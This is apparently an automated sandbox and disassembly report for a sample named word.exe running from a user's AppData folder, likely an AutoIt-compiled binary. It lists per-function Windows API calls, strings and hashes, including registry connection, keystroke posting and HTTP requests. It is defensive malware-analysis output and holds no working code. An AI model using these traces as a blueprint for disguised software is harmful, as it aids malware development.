                                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                    • API String ID: 0-1603158881
                                                                    • Opcode ID: b68d94a9d6a5d87f13f0fb5a725928f8f142c37ef967d8f11e3e615729381ce2
                                                                    • Instruction ID: 1d39c91c6ba170ccd8bd44326015c92659356e06a413e753493f98454e3169a0
                                                                    • Opcode Fuzzy Hash: b68d94a9d6a5d87f13f0fb5a725928f8f142c37ef967d8f11e3e615729381ce2
                                                                    • Instruction Fuzzy Hash: 49A1D3B14043459BCB20EF50CC81BDE37A4AF94348F44891FF9896B182EF79A64DC76A
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00479D1F
                                                                    • VariantInit.OLEAUT32(?), ref: 00479F06
                                                                    • VariantClear.OLEAUT32(?), ref: 00479F11
                                                                    • VariantInit.OLEAUT32(?), ref: 00479DF7
                                                                      • Part of subcall function 00467626: VariantInit.OLEAUT32(00000000), ref: 00467666
                                                                      • Part of subcall function 00467626: VariantCopy.OLEAUT32(00000000,00479BD3), ref: 00467670
                                                                      • Part of subcall function 00467626: VariantClear.OLEAUT32 ref: 0046767D
                                                                    • VariantClear.OLEAUT32(?), ref: 00479F9C
                                                                      • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                      • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                      • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                      • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$Copy$ClearInit$ErrorLast_memset
                                                                    • String ID: F$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                    • API String ID: 665237470-60002521
                                                                    • Opcode ID: d48da594d57f6aadbcc7a695fec4cf75dc39f6aec1ddb07572db38b207896a5c
                                                                    • Instruction ID: 799f1794578ead7d01377608c22e1fb401aa4fc5ffca8a64c02b8280356d09a3
                                                                    • Opcode Fuzzy Hash: d48da594d57f6aadbcc7a695fec4cf75dc39f6aec1ddb07572db38b207896a5c
                                                                    • Instruction Fuzzy Hash: 6091B272204341AFD720DF64D880EABB7E9EFC4314F50891EF28987291D7B9AD45C766
                                                                    APIs
                                                                    • GetSystemMetrics.USER32(0000000F), ref: 00440B7B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: MetricsSystem
                                                                    • String ID: X1
                                                                    • API String ID: 4116985748-2397719451
                                                                    • Opcode ID: eff4c90f3403bcfb76001cffaab33834930133fcb34fa8184a7caea4de8066d9
                                                                    • Instruction ID: 1e23dbab6d9439f1299be2c39bdf7de0481ead398f869a6d5eaf0ea33fa99bdf
                                                                    • Opcode Fuzzy Hash: eff4c90f3403bcfb76001cffaab33834930133fcb34fa8184a7caea4de8066d9
                                                                    • Instruction Fuzzy Hash: 8EA19C70608701DBE314CF68C984B6BBBE1FB88704F14491EFA8593251E778F965CB5A
                                                                    APIs
                                                                      • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                      • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                    • _memset.LIBCMT ref: 004538C4
                                                                    • GetMenuItemInfoW.USER32 ref: 004538EF
                                                                    • _wcslen.LIBCMT ref: 00453960
                                                                    • SetMenuItemInfoW.USER32 ref: 004539C4
                                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 004539E0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: ItemMenu$Info_wcslen$Default_memset_wcscpy
                                                                    • String ID: 0$p1$p1
                                                                    • API String ID: 3530711334-3666850458
                                                                    • Opcode ID: 4fb2f78e551ded06f9ea0c6980629f988d1b52bb21940f8f940b16680c272321
                                                                    • Instruction ID: 97d09e0af2b4d046480d7fb626e7fa0667c22e7462995616ff61acde959b3bac
                                                                    • Opcode Fuzzy Hash: 4fb2f78e551ded06f9ea0c6980629f988d1b52bb21940f8f940b16680c272321
                                                                    • Instruction Fuzzy Hash: 747118F15083015AD714DF65C881B6BB7E4EB98396F04491FFD8082292D7BCDA4CC7AA
                                                                    APIs
                                                                      • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046A84D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: ConnectRegistry_wcslen
                                                                    • String ID: HH
                                                                    • API String ID: 535477410-2761332787
                                                                    • Opcode ID: 95544a26956fe54eb2a8636236a3b10fc217bfdb2bff17811b2f45cb9df4731a
                                                                    • Instruction ID: 68d8ff7817732ac0dd8275009c421e29eb5870de2046e22f9b94a35ba54c9d9f
                                                                    • Opcode Fuzzy Hash: 95544a26956fe54eb2a8636236a3b10fc217bfdb2bff17811b2f45cb9df4731a
                                                                    • Instruction Fuzzy Hash: FE617FB56083009FD304EF65C981F6BB7E4AF88704F14891EF681A7291D678ED09CB97
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: X1
                                                                    • API String ID: 0-2397719451
                                                                    • Opcode ID: 2552f041a71837ba3affbc4ec308d2b7aa0755a9e2dfe05148a880b05b5b76bf
                                                                    • Instruction ID: b3b3da583a0ae8cfa3180eda0e634cae40a493ebdfd517dbec9d2fd4fbd82cb1
                                                                    • Opcode Fuzzy Hash: 2552f041a71837ba3affbc4ec308d2b7aa0755a9e2dfe05148a880b05b5b76bf
                                                                    • Instruction Fuzzy Hash: 1E513A315082909FE321CF14DC89FABBB64FB46320F18456FF895AB2D1D7649C06D7AA
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                    • String ID: 0$2
                                                                    • API String ID: 3311875123-3793063076
                                                                    • Opcode ID: fbdd9a11e44187a4bf70f7de18f8631e861f84fad9f8f26dcc1fb12baf34abbc
                                                                    • Instruction ID: 6c7ab59355789d00cbd42ef361c1bd9312a1bc9220e92816940967e3bd29aecc
                                                                    • Opcode Fuzzy Hash: fbdd9a11e44187a4bf70f7de18f8631e861f84fad9f8f26dcc1fb12baf34abbc
                                                                    • Instruction Fuzzy Hash: E451CF702043409FD710CF69D888B6BBBE4AFA5319F104A3EFD9586292D378994DCB67
                                                                    APIs
                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0044890A
                                                                    • SendMessageW.USER32(?,00000469,?,00000000), ref: 00448920
                                                                    • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                    • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                    • ShowWindow.USER32(004A83D8,00000000), ref: 00448C37
                                                                    • ShowWindow.USER32(004A83D8,00000004), ref: 00448C43
                                                                    • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Enable$Show$MessageMoveSend
                                                                    • String ID: X1
                                                                    • API String ID: 896007046-2397719451
                                                                    • Opcode ID: 440e8810410bf42a4c8e03fd117b8fd843bde7e89b0e2674ab81ad81c9f8ea0f
                                                                    • Instruction ID: 0809a8548e22334437b8974569d6adfa08582830463fbdb99c3481629354d751
                                                                    • Opcode Fuzzy Hash: 440e8810410bf42a4c8e03fd117b8fd843bde7e89b0e2674ab81ad81c9f8ea0f
                                                                    • Instruction Fuzzy Hash: 63419E746043419FF7248B24C884B6FB7A1FB99305F18886EF98197391DA78A845CB59
                                                                    APIs
                                                                    • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0044140E
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00441452
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00441493
                                                                    • SendMessageW.USER32(0031E158,000000F1,00000000,00000000), ref: 004414C6
                                                                    • SendMessageW.USER32(0031E158,000000F1,00000001,00000000), ref: 004414F1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$LongWindow
                                                                    • String ID: X1
                                                                    • API String ID: 312131281-2397719451
                                                                    • Opcode ID: ed470013e842d905752aa6f8daaa5f1d8e955df317e7b96a507e5c494099af20
                                                                    • Instruction ID: f6a862a32ccfd92e4f153a1965fa7dc80102ffdb8abe4b8a046001f82176c48d
                                                                    • Opcode Fuzzy Hash: ed470013e842d905752aa6f8daaa5f1d8e955df317e7b96a507e5c494099af20
                                                                    • Instruction Fuzzy Hash: 2F416A347442019FE720CF58DCC4F6A77A5FB8A754F24416AE5519B3B1CB75AC82CB48
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,004A8E80,00000100,00000100,?,C:\Users\user\AppData\Roaming\word.exe), ref: 0043719E
                                                                    • LoadStringW.USER32(00000000), ref: 004371A7
                                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 004371BD
                                                                    • LoadStringW.USER32(00000000), ref: 004371C0
                                                                    • _printf.LIBCMT ref: 004371EC
                                                                    • MessageBoxW.USER32 ref: 00437208
                                                                    Strings
                                                                    • %s (%d) : ==> %s: %s %s, xrefs: 004371E7
                                                                    • C:\Users\user\AppData\Roaming\word.exe, xrefs: 00437189
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: HandleLoadModuleString$Message_printf
                                                                    • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\AppData\Roaming\word.exe
                                                                    • API String ID: 220974073-1105308645
                                                                    • Opcode ID: 94d1ddb87e9fdddd1f0eb85761e890ae026325719f266e56d7856026e6b64315
                                                                    • Instruction ID: cc9e6972dbc5209964c20f0f7d1f7455a13934f6c555fd98bc0bf92a0502fb90
                                                                    • Opcode Fuzzy Hash: 94d1ddb87e9fdddd1f0eb85761e890ae026325719f266e56d7856026e6b64315
                                                                    • Instruction Fuzzy Hash: F7014FB2A543447AE620EB549D06FFB365CABC4B01F444C1EB794A60C0AAF865548BBA
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b00adbc1ea9d53563bb8a7982d93c3fa4b8356126e06b3aad1cc727703ca6f1a
                                                                    • Instruction ID: 20732dcab93056f759d0b04a6df1a57780e33876730225f1fefd21ccf2a16f59
                                                                    • Opcode Fuzzy Hash: b00adbc1ea9d53563bb8a7982d93c3fa4b8356126e06b3aad1cc727703ca6f1a
                                                                    • Instruction Fuzzy Hash: 36519070200301ABD320DF29CC85F5BB7E8EB48715F540A1EF995E7292D7B4E949CB29
                                                                    APIs
                                                                      • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\AppData\Roaming\word.exe,?,C:\Users\user\AppData\Roaming\word.exe,004A8E80,C:\Users\user\AppData\Roaming\word.exe,0040F3D2), ref: 0040FFCA
                                                                      • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 0045355E
                                                                    • MoveFileW.KERNEL32 ref: 0045358E
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                                    • String ID:
                                                                    • API String ID: 978794511-0
                                                                    • Opcode ID: 905b41a6b5f1f1e7811aa1c06e555ad1605d40905c9a381d53b63ac73f12040d
                                                                    • Instruction ID: dcad70f49e32ae1adaf0c812d378eb0bba467e0a617048934f4a65f03e3a0b24
                                                                    • Opcode Fuzzy Hash: 905b41a6b5f1f1e7811aa1c06e555ad1605d40905c9a381d53b63ac73f12040d
                                                                    • Instruction Fuzzy Hash: 665162B25043406AC724EF61D885ADFB3E8AFC8305F44992EB94992151E73DD34DC767
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2697ea5a26a9fc7488a3d070abad83f7d669ddccf749f4bfc66ff3ac1f4b4023
                                                                    • Instruction ID: b1e2397247e50d0c7000acf5a2db8631a214b417b603bec0598d849dd48054e0
                                                                    • Opcode Fuzzy Hash: 2697ea5a26a9fc7488a3d070abad83f7d669ddccf749f4bfc66ff3ac1f4b4023
                                                                    • Instruction Fuzzy Hash: E54128332402806BE320A75DB8C4ABBFB98E7A2362F50443FF18196520D76678C5D339
                                                                    APIs
                                                                      • Part of subcall function 0044593E: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 0044595D
                                                                      • Part of subcall function 0044593E: GetCurrentThreadId.KERNEL32(00000000,?,00000001,00478FA7), ref: 00445964
                                                                      • Part of subcall function 0044593E: AttachThreadInput.USER32(00000000,?,00000001), ref: 0044596B
                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D15
                                                                    • PostMessageW.USER32 ref: 00445D35
                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00445D3F
                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D45
                                                                    • PostMessageW.USER32 ref: 00445D66
                                                                    • Sleep.KERNEL32(00000000), ref: 00445D70
                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D76
                                                                    • PostMessageW.USER32 ref: 00445D8B
                                                                    • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000), ref: 00445D8F
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                    • String ID:
                                                                    • API String ID: 2014098862-0
                                                                    • Opcode ID: 621277f82d70151dd5f553487d646ea3797e8fa9e9e6e4ab5ab83039983e6254
                                                                    • Instruction ID: b085f3065cf9cd100f04f322da00d4b037e108fc79bf5967fdabce1cd6d2e74b
                                                                    • Opcode Fuzzy Hash: 621277f82d70151dd5f553487d646ea3797e8fa9e9e6e4ab5ab83039983e6254
                                                                    • Instruction Fuzzy Hash: 7B116971790704B7F620AB958C8AF5A7399EF88B11F20080DF790AB1C1C9F5E4418B7C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: X1
                                                                    • API String ID: 0-2397719451
                                                                    • Opcode ID: c82efa3070467c2623ec738b5b2be2cd760763614a3dd1863134219050ad48d5
                                                                    • Instruction ID: be39947db1ffbcb7075193c31d102fc15fe4f6af8d23ce90efbce3d2b6a77a88
                                                                    • Opcode Fuzzy Hash: c82efa3070467c2623ec738b5b2be2cd760763614a3dd1863134219050ad48d5
                                                                    • Instruction Fuzzy Hash: 4BF16D71108740AFD210DB59C880EABB7F9EFCA744F10891EF69983261D735AC45CBAA
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc_malloc$_strcat_strlen
                                                                    • String ID: AU3_FreeVar
                                                                    • API String ID: 2184576858-771828931
                                                                    • Opcode ID: 111e65442873bd7cbffe48700b84114c079de58427b558a04ef4a5d95244f0f0
                                                                    • Instruction ID: c940ad03d776ce5ee908f8b881b33357b51647545ffc53e819ca791e1fdac2da
                                                                    • Opcode Fuzzy Hash: 111e65442873bd7cbffe48700b84114c079de58427b558a04ef4a5d95244f0f0
                                                                    • Instruction Fuzzy Hash: EDA18DB5604205DFC300DF59C480A2AB7E5FFC8319F1489AEE9554B362D739ED89CB8A
                                                                    APIs
                                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D5A
                                                                    • DestroyWindow.USER32 ref: 0042A751
                                                                    • UnregisterHotKey.USER32(?), ref: 0042A778
                                                                    • FreeLibrary.KERNEL32(?), ref: 0042A822
                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0042A854
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                                    • String ID: close all
                                                                    • API String ID: 4174999648-3243417748
                                                                    • Opcode ID: ddf39f1eda455a1c63d5a7d3271f56cd3ed42d138f3b783cbb3ca1597947a384
                                                                    • Instruction ID: e23b5dd52123a376b0379481fe8be5d2f02d07e70979f80a1c72d587d5a24a2c
                                                                    • Opcode Fuzzy Hash: ddf39f1eda455a1c63d5a7d3271f56cd3ed42d138f3b783cbb3ca1597947a384
                                                                    • Instruction Fuzzy Hash: FFA17075A102248FCB20EF55CC85B9AB3B8BF44304F5044EEE90967291D779AE85CF9D
                                                                    APIs
                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AA5A
                                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AA8D
                                                                    • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0044AAF9
                                                                    • InternetSetOptionW.WININET(00000000,0000001F,?,00000004), ref: 0044AB11
                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB20
